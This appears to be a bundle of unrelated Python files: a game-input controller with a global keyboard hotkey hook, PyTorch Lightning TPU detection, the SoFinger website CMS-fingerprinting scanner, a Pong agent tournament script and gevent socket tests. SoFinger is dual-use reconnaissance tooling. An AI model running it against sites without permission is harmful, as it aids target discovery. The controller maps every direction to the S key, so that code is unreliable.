@staticmethod
def action_backward_down():
BaseCtrl.kbd_down(VirtualKeyCode.S_key)
@staticmethod
def action_backward_up():
BaseCtrl.kbd_up(VirtualKeyCode.S_key)
@staticmethod
def action_left_down():
BaseCtrl.kbd_down(VirtualKeyCode.S_key)
@staticmethod
def action_left_up():
BaseCtrl.kbd_up(VirtualKeyCode.S_key)
@staticmethod
def action_right_down():
BaseCtrl.kbd_down(VirtualKeyCode.S_key)
@staticmethod
def action_right_up():
BaseCtrl.kbd_up(VirtualKeyCode.S_key)
@staticmethod
def action_up_down():
BaseCtrl.kbd_down(VirtualKeyCode.S_key)
@staticmethod
def action_up_up():
BaseCtrl.kbd_up(VirtualKeyCode.S_key)
@staticmethod
def action_down_down():
BaseCtrl.kbd_down(VirtualKeyCode.S_key)
@staticmethod
def action_down_up():
BaseCtrl.kbd_up(VirtualKeyCode.S_key)
@staticmethod
def item_bar():
BaseCtrl.kbd_click(VirtualKeyCode.E_key)
@staticmethod
def hot_key(function):
class KeyboardMgr:
m_bZeroKeyPressed = False
m_bShiftKeyPressed = False
def on_key_pressed(self, event):
if str(event.Key) == 'Lshift' or str(event.Key) == 'Rshift' and self.m_bZeroKeyPressed != True:
self.m_bShiftKeyPressed = True
if event.Alt == 32 and str(event.Key) == 'Z' and self.m_bShiftKeyPressed == True:
function()
return True
def on_key_up(self, event):
if str(event.Key) == 'Lshift' or str(event.Key) == 'Rshift':
self.m_bShiftKeyPressed = False
elif str(event.Key) == 'Z':
self.m_bZeroKeyPressed = False
return True
keyMgr = KeyboardMgr()
hookMgr = pyHook.HookManager()
hookMgr.KeyDown = keyMgr.on_key_pressed
hookMgr.KeyUp = keyMgr.on_key_up
hookMgr.HookKeyboard()
pythoncom.PumpMessages()
@staticmethod
# 按下热键的时候的处理
def when_hot_key(function):
t = threading.Thread(target=BaseCtrl.hot_key, args=(function, ))
t.setDaemon(True)
t.start()
if __name__ == '__main__':
# BaseCtrl.when_hot_key(lambda: print('HOT'))
# time.sleep(10)
BaseCtrl.move(65536 // 10, 65536 // 10)
|
xla_device.py
|
# Copyright The PyTorch Lightning team.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import functools
import os
import queue as q
import traceback
from multiprocessing import Process, Queue
from pytorch_lightning.utilities.imports import _XLA_AVAILABLE
if _XLA_AVAILABLE:
import torch_xla.core.xla_model as xm
# define TPU availability timeout in seconds
TPU_CHECK_TIMEOUT = 60
def inner_f(queue, func, *args, **kwargs): # pragma: no cover
try:
queue.put(func(*args, **kwargs))
# todo: specify the possible exception
except Exception:
traceback.print_exc()
queue.put(None)
def pl_multi_process(func):
@functools.wraps(func)
def wrapper(*args, **kwargs):
queue = Queue()
proc = Process(target=inner_f, args=(queue, func, *args), kwargs=kwargs)
proc.start()
proc.join(TPU_CHECK_TIMEOUT)
try:
return queue.get_nowait()
except q.Empty:
traceback.print_exc()
return False
return wrapper
class XLADeviceUtils:
"""Used to detect the type of XLA device"""
_TPU_AVAILABLE = False
@staticmethod
@pl_multi_process
def _is_device_tpu() -> bool:
"""
Check if TPU devices are available
Return:
A boolean value indicating if TPU devices are available
"""
# For the TPU Pod training process, for example, if we have
# TPU v3-32 with 4 VMs, the world size would be 4 and as
# we would have to use `torch_xla.distributed.xla_dist` for
# multiple VMs and TPU_CONFIG won't be available, running
# `xm.get_xla_supported_devices("TPU")` won't be possible.
if xm.xrt_world_size() > 1:
return True
return len(xm.get_xla_supported_devices("TPU")) > 0
@staticmethod
def xla_available() -> bool:
"""
Check if XLA library is installed
Return:
A boolean value indicating if a XLA is installed
"""
return _XLA_AVAILABLE
@staticmethod
def tpu_device_exists() -> bool:
"""
Runs XLA device check within a separate process
Return:
A boolean value indicating if a TPU device exists on the system
"""
if os.getenv("PL_TPU_AVAILABLE", "0") == "1":
XLADeviceUtils._TPU_AVAILABLE = True
if XLADeviceUtils.xla_available() and not XLADeviceUtils._TPU_AVAILABLE:
XLADeviceUtils._TPU_AVAILABLE = XLADeviceUtils._is_device_tpu()
if XLADeviceUtils._TPU_AVAILABLE:
os.environ["PL_TPU_AVAILABLE"] = "1"
return XLADeviceUtils._TPU_AVAILABLE
|
SoFinger.py
|
'''
@Description: SoFinger
@Author: Longlone
@LastEditors : Longlone
@Supported By : TideSec/TideFinger zerokeeper/WebEye
@Version : V0.1 Beta
@Date: 2020-01-09 09:20:34
@LastEditTime : 2020-01-14 16:00:21
'''
# TODO config.txt 添加banner
import argparse
from os import path, makedirs
from time import time
import multiprocessing
from general import connect, message, color
from Myplugin import Platform
CURSOR = None
CONN = None
def select(sql):
global CURSOR
try:
CURSOR.execute(sql)
return CURSOR.fetchall()
except Exception:
return None
if (__name__ == '__main__'):
# --------------------------------------------
CONN, CURSOR = connect()
if (CONN is None and CURSOR is None):
message('-', ' Connect database failed')
exit(1)
# --------------------------------------------
parser = argparse.ArgumentParser(
description='Check CMS for website(s).', formatter_class=argparse.ArgumentDefaultsHelpFormatter)
parser.add_argument(
'url', nargs='+', help='The website URL/ The URLs File')
parser.add_argument(
'--version', action='version', version='SoFinger Version: 0.1 Beta', help='Show version and exit')
parser.add_argument('--time', nargs='?', type=int,
default=3, const=1, help=' Timeout of requests')
parser.add_argument('--thread', nargs='?', type=int,
default=20, const=1, help=' Thread number for tasks')
parser.add_argument('--retry', nargs='?', type=int,
default=1, const=1, help='Maximum number of attempts per link')
parser.add_argument(
'--verbose', help='Verbose output', action='store_true')
parser.add_argument('-s', '--silence',
help='Keep slience when running', action='store_true')
parser.add_argument(
'-f', '--fast', help='Use silence mode, and all plugins will be run at the same time by multiprocessing.', action='store_true')
args = parser.parse_args()
urls = args.url
if (len(urls) == 1 and path.isfile(urls[0])):
f = open(urls[0], 'r')
urls = f.readlines()
urls = [s.strip() for s in urls]
f.close()
fast = True if (args.fast) else False
silence = True if (args.silence or fast is True) else False
verbose = True if (args.verbose) else False
# --------------------------------------------
# if (silence is False):
# import logo
# --------------------------------------------
pf = Platform('plugins', required='run', message=True)
# for each in pf.get_messages():
# message('#', each)
preload_cms = select(
"SELECT distinct path, options FROM cms ORDER BY hit DESC")
quick_cms = select(
"SELECT name, keys, id, hit FROM fofa ORDER BY hit DESC")
md5_cms = select(
"SELECT cms_name, path, match_pattern, finger_id FROM cms WHERE options='md5' ORDER BY hit DESC")
keyword_cms = select(
"SELECT cms_name, path, match_pattern, finger_id FROM cms WHERE options='keyword' ORDER BY hit DESC")
regx_cms = select(
"SELECT cms_name, path, match_pattern, finger_id FROM cms WHERE options='regx' ORDER BY hit DESC")
# --------------------------------------------
for each_url in urls:
each_url = each_url.strip()
if ('//' in each_url):
store_path = 'Results/' + each_url.split('//')[1].replace('/', '')
else:
store_path = 'Results/' + each_url.replace('/', '')
if (not path.isdir(store_path)):
makedirs(store_path)
now = time()
message('!', 'Target URL: %s' % each_url)
# --------------------------------------------
if (fast is True):
MANAGER = multiprocessing.Manager()
ARG_DICT = MANAGER.dict()
REQUEST_DICT = MANAGER.dict()
CMS_SUCCESS = MANAGER.list()
else:
ARG_DICT = dict()
REQUEST_DICT = dict()
CMS_SUCCESS = list()
QUICK_SUCCESS = list()
ARG_DICT['timeout'] = args.time
ARG_DICT['retry'] = args.retry
ARG_DICT['thread'] = args.thread
ARG_DICT['silence'] = silence
ARG_DICT['verbose'] = verbose
ARG_DICT['fast'] = fast
# --------------------------------------------
if (fast is True): # 快速模式
process_list = []
QUICK_SUCCESS = MANAGER.list()
preload_p = multiprocessing.Process(target=pf['preload'].run, args=(each_url, preload_cms, ARG_DICT, REQUEST_DICT))
preload_p.start()
try:
preload_p.join() # 等待preload结束
except KeyboardInterrupt:
exit(1)
if ('/' in REQUEST_DICT):
quick_p = multiprocessing.Process(target=pf['quick'].run, args=(each_url, REQUEST_DICT['/'], REQUEST_DICT['headers'], quick_cms, ARG_DICT, QUICK_SUCCESS))
process_list.append(quick_p)
cms_p1 = multiprocessing.Process(target=pf['cms'].run, args=(each_url, md5_cms, 'md5', REQUEST_DICT, ARG_DICT, CMS_SUCCESS)) # MD5检测
process_list.append(cms_p1)
cms_p2 = multiprocessing.Process(target=pf['cms'].run, args=(each_url, keyword_cms, 'keyword', REQUEST_DICT, ARG_DICT, CMS_SUCCESS)) # regx检测
process_list.append(cms_p2)
cms_p3 = multiprocessing.Process(target=pf['cms'].run, args=(each_url, regx_cms, 'regx', REQUEST_DICT, ARG_DICT, CMS_SUCCESS)) # keyword检测
process_list.append(cms_p3)
for each in process_list:
each.start()
for each in process_list:
each.join()
else:
REQUEST_DICT = pf['preload'].run(each_url, preload_cms, ARG_DICT)
if ('STOP' in REQUEST_DICT):
exit(1)
if ('/' in REQUEST_DICT):
QUICK_SUCCESS = pf['quick'].run(each_url, REQUEST_DICT['/'], REQUEST_DICT['headers'], quick_cms, ARG_DICT)
CMS_SUCCESS.extend(pf['cms'].run(
each_url, md5_cms, 'md5', REQUEST_DICT, ARG_DICT)) # MD5检测
CMS_SUCCESS.extend(pf['cms'].run(
each_url, regx_cms, 'regx', REQUEST_DICT, ARG_DICT)) # regx检测
CMS_SUCCESS.extend(pf['cms'].run(
each_url, keyword_cms, 'keyword', REQUEST_DICT, ARG_DICT)) # keyword检测
# --------------------------------------------
print()
QUICK_SUCCESS = set(QUICK_SUCCESS)
CMS_SUCCESS = set(CMS_SUCCESS)
message('+', '%s %s (Check: %s)' % ('Current Task:',
color.cyan(each_url), color.yellow(store_path + '/')))
print('-' * 50)
message('+', '%s %s' % (color.red('fofa_banner:'),
color.green(' '.join(QUICK_SUCCESS))))
message('+', '%s %s' % (color.red('cms_finger:'),
color.green(' '.join(CMS_SUCCESS))))
interval = str(round(time() - now, 2))
message('+', '%s %s' %
(color.red('Total Time:'), color.blue(interval)))
print('-' * 50)
with open(store_path + '/results.txt', 'w') as f:
f.write('fofa_banner: ' + ' '.join(QUICK_SUCCESS) + '\n')
f.write('cms_finger: ' + ' '.join(CMS_SUCCESS))
CONN.close()
|
epic_battle_royale.py
|
import argparse
import sys
import os
from pong_testbench import PongTestbench
from multiprocessing import Process, Queue
from matplotlib import font_manager
from time import sleep
import importlib
import traceback
import numpy as np
import pickle
parser = argparse.ArgumentParser()
parser.add_argument("dir", type=str, help="Directory with agents.")
parser.add_argument("--render", "-r", action="store_true", help="Render the competition.")
parser.add_argument("--games", "-g", type=int, default=100, help="Number of games.")
parser.add_argument("--max_proc", "-p", type=int, default=4, help="Max number of processes.")
parser.add_argument("--start-file", "-f", type=str, default=None, help="Start file")
args = parser.parse_args()
save_file = "ebr_save.p"
def run_test(id1, agent1_dir, id2, agent2_dir, queue, games, render):
# Add the first agent to Python import path
sys.path.insert(0, agent1_dir)
orig_wd = os.getcwd()
# Import the first agent
try:
import agent
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir to the directory (needed for loading the model)
# and instantiate the agent
os.chdir(agent1_dir)
try:
agent1 = agent.Agent()
agent1.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 1st agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Go back to the original directory
os.chdir(orig_wd)
# Remove agent1 from path
del sys.path[0]
# Add the 2nd agent to path
sys.path.insert(0, agent2_dir)
# reload the agent module using agent.py from the new dir
try:
importlib.reload(agent)
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while importing 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# chdir, instantiate, cleanup (same as before)
os.chdir(agent2_dir)
try:
agent2 = agent.Agent()
agent2.load_model()
except Exception as e:
print(f"!!! Something went wrong in {id1}:{id2} while loading 2nd agent")
print(f"!!! agent1_dir={agent1_dir}, agent2_dir={agent2_dir}")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
os.chdir(orig_wd)
del sys.path[0]
# Get names
name1 = agent1.get_name()
name2 = agent2.get_name()
# Create and init the testbench for the agents
testbench = PongTestbench(render)
testbench.init_players(agent1, agent2)
# Run the match
try:
testbench.run_test(games)
except Exception as e:
print(f"!!! Something went wrong in {name1} ({id1}) vs {name2} ({id2})")
print(f"!!! Error")
print("!!!", e)
print("!!! Traceback")
traceback.print_exc()
return
# Get scores and pass them to the parent process
wins1, games = testbench.get_agent_score(agent1)
wins2, games = testbench.get_agent_score(agent2)
print(f"{name1} vs {name2} finished, wins1={wins1}, wins2={wins2}")
queue.put((id1, id2, wins1, wins2, name1, name2, games))
def get_directories(top_dir):
subdir_list = []
subdir_gen = os.walk(top_dir)
# Recursively scout the directory for agents
for dir, subdirs, files in subdir_gen:
if "__pycache__" in dir:
continue
if "agent.py" not in files:
print("Warn: No agent.py found in %s. Skipping." % dir)
continue
subdir_list.append(dir)
print("%s added to directory list." % dir)
subdir_list.sort()
# Return a list of folders with agent.py
return subdir_list
def epic_battle_royale(top_dir, max_proc=4):
directories = get_directories(top_dir)
names = ["__unknown__"] * len(directories)
procs = []
result_queue = Queue()
all_results = []
skipdict = []
print("Finished scanning for agents; found:", len(directories))
if args.start_file is not None:
with open(args.start_file, "rb") as f:
all_results = pickle.load(f)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
print(f"Skipping {name1}:{name2} cause already played")
skipdict.append((id1, id2))
print(f"Total skipped: {len(skipdict)}")
for i1, d1 in enumerate(directories):
for i2, d2 in enumerate(directories):
if i1 == i2:
continue
if (i1, i2) in skipdict:
continue
pargs = (i1, d1, i2, d2, result_queue, args.games, args.render)
proc = Process(target=run_test, args=pargs)
procs.append(proc)
print("Living procs:", sum(p.is_alive() for p in procs))
while sum(p.is_alive() for p in procs) >= max_proc:
sleep(0.3)
print("Starting process (%d / %d)" % (i1*len(directories) + i2, len(directories)**2))
proc.start()
sleep(1)
# Join dead ones
new_p = []
for p in procs:
if not p.is_alive():
p.join(1)
else:
new_p.append(p)
procs = new_p
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
with open(save_file, "wb") as f:
pickle.dump(all_results, f)
for p in procs:
try:
# Give it some final timeout. 20 sec/game is a very safe choice.
# It shouldn't happen anyway; it's there just to prevent us from
# losing all results in case of some pipes issues or a deadlock
timeout = args.games * 20
p.join(timeout)
p.terminate()
# Prevent errors in old Python versions
if hasattr(p, "kill"):
p.kill()
except Exception as e:
print("Join/Terminate/Kill error")
traceback.print_exc()
while result_queue.qsize() > 0:
all_results.append(result_queue.get())
# Fetch all results from the queue
no_agents = len(directories)
games_won = np.zeros((no_agents, no_agents), dtype=np.int32)
total_games = np.zeros((no_agents, ), dtype=np.int32)
for id1, id2, wins1, wins2, name1, name2, games in all_results:
# Sanity check...
if wins1 + wins2 != games:
print(f"Wins dont sum up! {name1} vs {name2}: {wins1}+{wins2} != {games}")
games_won[id1, id2] += wins1
games_won[id2, id1] += wins2
names[id1] = name1
names[id2] = name2
total_games[id1] += games
total_games[id2] += games
# Save raw results as numpy
np.save("brres", games_won)
# Format: Wins of ROW versus COLUMN
np.savetxt("battle_royale_results.txt", games_won, fmt="%d")
np.savetxt("battle_royale_players.txt", directories, fmt="%s")
# Sum across columns to get total wins of each agent
total_wins = games_won.sum(axis=1)
# And across rows to get total losses.
total_losses = games_won.sum(axis=0)
agent_wins = list(zip(total_wins, total_losses, names, directories, total_games))
agent_wins.sort(key=lambda x: -x[0])
# Save the leaderboard
resfile = open("leaderboard.txt", "w")
print("")
print("-"*80)
print("--- LEADERBOARD ---")
for i, (wins, losses, name, dir, games) in enumerate(agent_wins):
winrate = wins/(wins+losses)
line = f"{i+1}. {name} with {wins} wins in {games} games (winrate {winrate*100:.2f}%) (from {dir})"
resfile.write(line+"\n")
print(line)
resfile.close()
print("-"*80)
print("")
print("Finished!")
if __name__ == "__main__":
epic_battle_royale(args.dir, args.max_proc)
|
thread.py
|
import data as d
import threading
d.init()
d.out()
def foo():
print("calling add_num from thread")
d.add_num(132)
t =threading.Thread(target=foo)
print("starting thread")
t.start()
print('joining to thread')
t.join()
d.out()
print('done')
|
test__socket.py
|
# This line can be commented out so that most tests run with the
# system socket for comparison.
from __future__ import print_function
from __future__ import absolute_import
from gevent import monkey
monkey.patch_all()
import sys
import array
import socket
import time
import unittest
from functools import wraps
import gevent
from gevent._compat import reraise
import gevent.testing as greentest
from gevent.testing import six
from gevent.testing import LARGE_TIMEOUT
from gevent.testing import support
from gevent.testing import params
from gevent.testing.sockets import tcp_listener
from gevent.testing.skipping import skipWithoutExternalNetwork
from gevent.testing.skipping import skipOnMacOnCI
# we use threading on purpose so that we can test both regular and
# gevent sockets with the same code
from threading import Thread as _Thread
from threading import Event
errno_types = int
class BaseThread(object):
terminal_exc = None
def __init__(self, target):
@wraps(target)
def errors_are_fatal(*args, **kwargs):
try:
return target(*args, **kwargs)
except: # pylint:disable=bare-except
self.terminal_exc = sys.exc_info()
raise
self.target = errors_are_fatal
class GreenletThread(BaseThread):
def __init__(self, target=None, args=()):
BaseThread.__init__(self, target)
self.glet = gevent.spawn(self.target, *args)
def join(self, *args, **kwargs):
return self.glet.join(*args, **kwargs)
def is_alive(self):
return not self.glet.ready()
if not monkey.is_module_patched('threading'):
class ThreadThread(BaseThread, _Thread):
def __init__(self, **kwargs):
target = kwargs.pop('target')
BaseThread.__init__(self, target)
_Thread.__init__(self, target=self.target, **kwargs)
self.start()
Thread = ThreadThread
else:
Thread = GreenletThread
class TestTCP(greentest.TestCase):
__timeout__ = None
TIMEOUT_ERROR = socket.timeout
long_data = ", ".join([str(x) for x in range(20000)])
if not isinstance(long_data, bytes):
long_data = long_data.encode('ascii')
def setUp(self):
super(TestTCP, self).setUp()
if '-v' in sys.argv:
printed = []
try:
from time import perf_counter as now
except ImportError:
from time import time as now
def log(*args):
if not printed:
print()
printed.append(1)
print("\t -> %0.6f" % now(), *args)
orig_cot = self._close_on_teardown
def cot(o):
log("Registering for teardown", o)
def c(o=o):
log("Closing on teardown", o)
o.close()
o = None
orig_cot(c)
return o
self._close_on_teardown = cot
else:
def log(*_args):
"Does nothing"
self.log = log
self.listener = self._close_on_teardown(self._setup_listener())
# It is important to watch the lifetimes of socket objects and
# ensure that:
# (1) they are closed; and
# (2) *before* the next test begins.
#
# For example, it's a bad bad thing to leave a greenlet running past the
# scope of the individual test method if that greenlet will close
# a socket object --- especially if that socket object might also have been
# closed explicitly.
#
# On Windows, we've seen issue with filenos getting reused while something
# still thinks they have the original fileno around. When they later
# close that fileno, a completely unrelated object is closed.
self.port = self.listener.getsockname()[1]
def _setup_listener(self):
return tcp_listener()
def create_connection(self, host=None, port=None, timeout=None,
blocking=None):
sock = self._close_on_teardown(socket.socket())
sock.connect((host or params.DEFAULT_CONNECT, port or self.port))
if timeout is not None:
sock.settimeout(timeout)
if blocking is not None:
sock.setblocking(blocking)
return sock
def _test_sendall(self, data, match_data=None, client_method='sendall',
**client_args):
# pylint:disable=too-many-locals,too-many-branches,too-many-statements
log = self.log
log("test_sendall using method", client_method)
read_data = []
accepted_event = Event()
def accept_and_read():
log("\taccepting", self.listener)
conn, _ = self.listener.accept()
try:
with conn.makefile(mode='rb') as r:
log("\taccepted on server; client conn is", conn, "file is", r)
accepted_event.set()
log("\treading")
read_data.append(r.read())
log("\tdone reading", r, "got bytes", len(read_data[0]))
del r
finally:
conn.close()
del conn
server = Thread(target=accept_and_read)
try:
log("creating client connection")
client = self.create_connection(**client_args)
# It's important to wait for the server to fully accept before
# we shutdown and close the socket. In SSL mode, the number
# and timing of data exchanges to complete the handshake and
# thus exactly when greenlet switches occur, varies by TLS version.
#
# It turns out that on < TLS1.3, we were getting lucky and the
# server was the greenlet that raced ahead and blocked in r.read()
# before the client returned from create_connection().
#
# But when TLS 1.3 was deployed (OpenSSL 1.1), the *client* was the
# one that raced ahead while the server had yet to return from
# self.listener.accept(). So the client sent the data to the socket,
# and closed, before the server could do anything, and the server,
# when it got switched to by server.join(), found its new socket
# dead.
accepted_event.wait()
log("Client got accepted event from server", client, "; sending data", len(data))
try:
x = getattr(client, client_method)(data)
log("Client sent data: result from method", x)
finally:
log("Client will unwrap and shutdown")
if hasattr(client, 'unwrap'):
# Are we dealing with an SSLSocket? If so, unwrap it
# before attempting to shut down the socket. This does the
# SSL shutdown handshake and (hopefully) stops ``accept_and_read``
# from generating ``ConnectionResetError`` on AppVeyor.
try:
client = client.unwrap()
except ValueError:
pass
try:
# The implicit reference-based nastiness of Python 2
# sockets interferes, especially when using SSL sockets.
# The best way to get a decent FIN to the server is to shutdown
# the output. Doing that on Python 3, OTOH, is contraindicated
# except on PyPy, so this used to read ``PY2 or PYPY``. But
# it seems that a shutdown is generally good practice, and I didn't
# document what errors we saw without it. Per issue #1637
# lets do a shutdown everywhere, but only after removing any
# SSL wrapping.
client.shutdown(socket.SHUT_RDWR)
except (OSError, socket.error):
pass
log("Client will close")
client.close()
finally:
server.join(10)
assert not server.is_alive()
if server.terminal_exc:
reraise(*server.terminal_exc)
if match_data is None:
match_data = self.long_data
read_data = read_data[0].split(b',')
match_data = match_data.split(b',')
self.assertEqual(read_data[0], match_data[0])
self.assertEqual(len(read_data), len(match_data))
self.assertEqual(read_data, match_data)
def test_sendall_str(self):
self._test_sendall(self.long_data)
if six.PY2:
def test_sendall_unicode(self):
self._test_sendall(six.text_type(self.long_data))
@skipOnMacOnCI("Sometimes fails for no apparent reason (buffering?)")
def test_sendall_array(self):
data = array.array("B", self.long_data)
self._test_sendall(data)
def test_sendall_empty(self):
data = b''
self._test_sendall(data, data)
def test_sendall_empty_with_timeout(self):
# Issue 719
data = b''
self._test_sendall(data, data, timeout=10)
def test_sendall_nonblocking(self):
# https://github.com/benoitc/gunicorn/issues/1282
# Even if the socket is non-blocking, we make at least
# one attempt to send data. Under Py2 before this fix, we
# would incorrectly immediately raise a timeout error
data = b'hi\n'
self._test_sendall(data, data, blocking=False)
def test_empty_send(self):
# Issue 719
data = b''
self._test_sendall(data, data, client_method='send')
def test_fullduplex(self):
N = 100000
def server():
remote_client, _ = self.listener.accept()
self._close_on_teardown(remote_client)
# start reading, then, while reading, start writing. the reader should not hang forever
sender = Thread(target=remote_client.sendall,
args=((b't' * N),))
try:
result = remote_client.recv(1000)
self.assertEqual(result, b'hello world')
finally:
sender.join()
server_thread = Thread(target=server)
client = self.create_connection()
client_file = self._close_on_teardown(client.makefile())
client_reader = Thread(target=client_file.read, args=(N, ))
time.sleep(0.1)
client.sendall(b'hello world')
time.sleep(0.1)
# close() used to hang
client_file.close()
client.close()
# this tests "full duplex" bug;
server_thread.join()
client_reader.join()
def test_recv_timeout(self):
def accept():
# make sure the conn object stays alive until the end;
# premature closing triggers a ResourceWarning and
# EOF on the client.
conn, _ = self.listener.accept()
self._close_on_teardown(conn)
acceptor = Thread(target=accept)
client = self.create_connection()
try:
client.settimeout(1)
start = time.time()
with self.assertRaises(self.TIMEOUT_ERROR):
client.recv(1024)
took = time.time() - start
self.assertTimeWithinRange(took, 1 - 0.1, 1 + 0.1)
finally:
acceptor.join()
# Subclasses can disable this
_test_sendall_timeout_check_time = True
# Travis-CI container infrastructure is configured with
# large socket buffers, at least 2MB, as-of Jun 3, 2015,
# so we must be sure to send more data than that.
# In 2018, this needs to be increased *again* as a smaller value was
# still often being sent.
_test_sendall_data = b'hello' * 100000000
# This doesn't make much sense...why are we really skipping this?
@greentest.skipOnWindows("On Windows send() accepts whatever is thrown at it")
def test_sendall_timeout(self):
client_sock = []
acceptor = Thread(target=lambda: client_sock.append(self.listener.accept()))
client = self.create_connection()
time.sleep(0.1)
assert client_sock
client.settimeout(0.1)
start = time.time()
try:
with self.assertRaises(self.TIMEOUT_ERROR):
client.sendall(self._test_sendall_data)
if self._test_sendall_timeout_check_time:
took = time.time() - start
self.assertTimeWithinRange(took, 0.09, 0.2)
finally:
acceptor.join()
client.close()
client_sock[0][0].close()
def test_makefile(self):
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.flush()
fd.close()
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
# Closing the socket doesn't close the file
client_file = client.makefile(mode='rb')
client.close()
line = client_file.readline()
self.assertEqual(line, b'hello\n')
self.assertEqual(client_file.read(), b'')
client_file.close()
finally:
acceptor.join()
def test_makefile_timeout(self):
def accept_once():
conn, _ = self.listener.accept()
try:
time.sleep(0.3)
finally:
conn.close() # for pypy
acceptor = Thread(target=accept_once)
try:
client = self.create_connection()
client.settimeout(0.1)
fd = client.makefile(mode='rb')
self.assertRaises(self.TIMEOUT_ERROR, fd.readline)
client.close()
fd.close()
finally:
acceptor.join()
def test_attributes(self):
s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM, 0)
self.assertEqual(socket.AF_INET, s.type)
self.assertEqual(socket.SOCK_DGRAM, s.family)
self.assertEqual(0, s.proto)
if hasattr(socket, 'SOCK_NONBLOCK'):
s.settimeout(1)
self.assertEqual(socket.AF_INET, s.type)
s.setblocking(0)
std_socket = monkey.get_original('socket', 'socket')(socket.AF_INET, socket.SOCK_DGRAM, 0)
try:
std_socket.setblocking(0)
self.assertEqual(std_socket.type, s.type)
finally:
std_socket.close()
s.close()
def test_connect_ex_nonblocking_bad_connection(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
ret = s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, support.find_unused_port()))
self.assertIsInstance(ret, errno_types)
finally:
s.close()
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_connect_ex_gaierror(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
with self.assertRaises(socket.gaierror):
s.connect_ex(('foo.bar.fizzbuzz', support.find_unused_port()))
finally:
s.close()
def test_connect_ex_nonblocking_overflow(self):
# Issue 841
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
s.setblocking(False)
with self.assertRaises(OverflowError):
s.connect_ex((greentest.DEFAULT_LOCAL_HOST_ADDR, 65539))
finally:
s.close()
@unittest.skipUnless(hasattr(socket, 'SOCK_CLOEXEC'),
"Requires SOCK_CLOEXEC")
def test_connect_with_type_flags_ignored(self):
# Issue 944
# If we have SOCK_CLOEXEC or similar, we shouldn't be passing
# them through to the getaddrinfo call that connect() makes
SOCK_CLOEXEC = socket.SOCK_CLOEXEC # pylint:disable=no-member
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM | SOCK_CLOEXEC)
def accept_once():
conn, _ = self.listener.accept()
fd = conn.makefile(mode='wb')
fd.write(b'hello\n')
fd.close()
conn.close()
acceptor = Thread(target=accept_once)
try:
s.connect((params.DEFAULT_CONNECT, self.port))
fd = s.makefile(mode='rb')
self.assertEqual(fd.readline(), b'hello\n')
fd.close()
s.close()
finally:
acceptor.join()
class TestCreateConnection(greentest.TestCase):
__timeout__ = LARGE_TIMEOUT
def test_refuses(self, **conn_args):
connect_port = support.find_unused_port()
with self.assertRaisesRegex(
socket.error,
# We really expect "connection refused". It's unclear
# where/why we would get '[errno -2] name or service
# not known' but it seems some systems generate that.
# https://github.com/gevent/gevent/issues/1389 Somehow
# extremly rarely we've also seen 'address already in
# use', which makes even less sense. The manylinux
# 2010 environment produces 'errno 99 Cannot assign
# requested address', which, I guess?
'refused|not known|already in use|assign'
):
socket.create_connection(
(greentest.DEFAULT_BIND_ADDR, connect_port),
timeout=30,
**conn_args
)
def test_refuses_from_port(self):
source_port = support.find_unused_port()
# Usually we don't want to bind/connect to '', but
# using it as the source is required if we don't want to hang,
# at least on some systems (OS X)
self.test_refuses(source_address=('', source_port))
@greentest.ignores_leakcheck
@skipWithoutExternalNetwork("Tries to resolve hostname")
def test_base_exception(self):
# such as a GreenletExit or a gevent.timeout.Timeout
class E(BaseException):
pass
class MockSocket(object):
created = ()
closed = False
def __init__(self, *_):
MockSocket.created += (self,)
def connect(self, _):
raise E(_)
def close(self):
self.closed = True
def mockgetaddrinfo(*_):
return [(1, 2, 3, 3, 5),]
import gevent.socket as gsocket
# Make sure we're monkey patched
self.assertEqual(gsocket.create_connection, socket.create_connection)
orig_socket = gsocket.socket
orig_getaddrinfo = gsocket.getaddrinfo
try:
gsocket.socket = MockSocket
gsocket.getaddrinfo = mockgetaddrinfo
with self.assertRaises(E):
socket.create_connection(('host', 'port'))
self.assertEqual(1, len(MockSocket.created))
self.assertTrue(MockSocket.created[0].closed)
finally:
MockSocket.created = ()
gsocket.socket = orig_socket
gsocket.getaddrinfo = orig_getaddrinfo
class TestFunctions(greentest.TestCase):
@greentest.ignores_leakcheck
# Creating new types in the function takes a cycle to cleanup.
def test_wait_timeout(self):
# Issue #635
from gevent import socket as gsocket
class io(object):
callback = None
def start(self, *_args):
gevent.sleep(10)
with self.assertRaises(gsocket.timeout):
gsocket.wait(io(), timeout=0.01) # pylint:disable=no-member
def test_signatures(self):
# https://github.com/gevent/gevent/issues/960
exclude = []
if greentest.PYPY:
# Up through at least PyPy 5.7.1, they define these as
# gethostbyname(host), whereas the official CPython argument name
# is hostname. But cpython doesn't allow calling with keyword args.
# Likewise for gethostbyaddr: PyPy uses host, cpython uses ip_address
exclude.append('gethostbyname')
